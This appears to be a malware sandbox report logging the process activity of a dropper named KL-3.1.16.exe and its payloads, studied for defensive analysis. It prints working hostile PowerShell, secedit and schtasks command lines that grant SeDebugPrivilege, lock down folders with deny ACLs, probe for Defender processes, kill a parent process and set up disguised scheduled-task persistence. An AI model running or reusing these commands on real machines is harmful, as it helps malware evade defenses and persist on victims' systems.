Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe

33_2_06CF3C8E

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_06CF4652 GetModuleFileNameA,ShellExecuteExA,ExitProcess,

33_2_06CF4652

Source: C:\Users\user\Desktop\KL-3.1.16.exe	Process created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5904754 "__IRAFN:C:\Users\user\Desktop\KL-3.1.16.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=6980').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.')) -force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
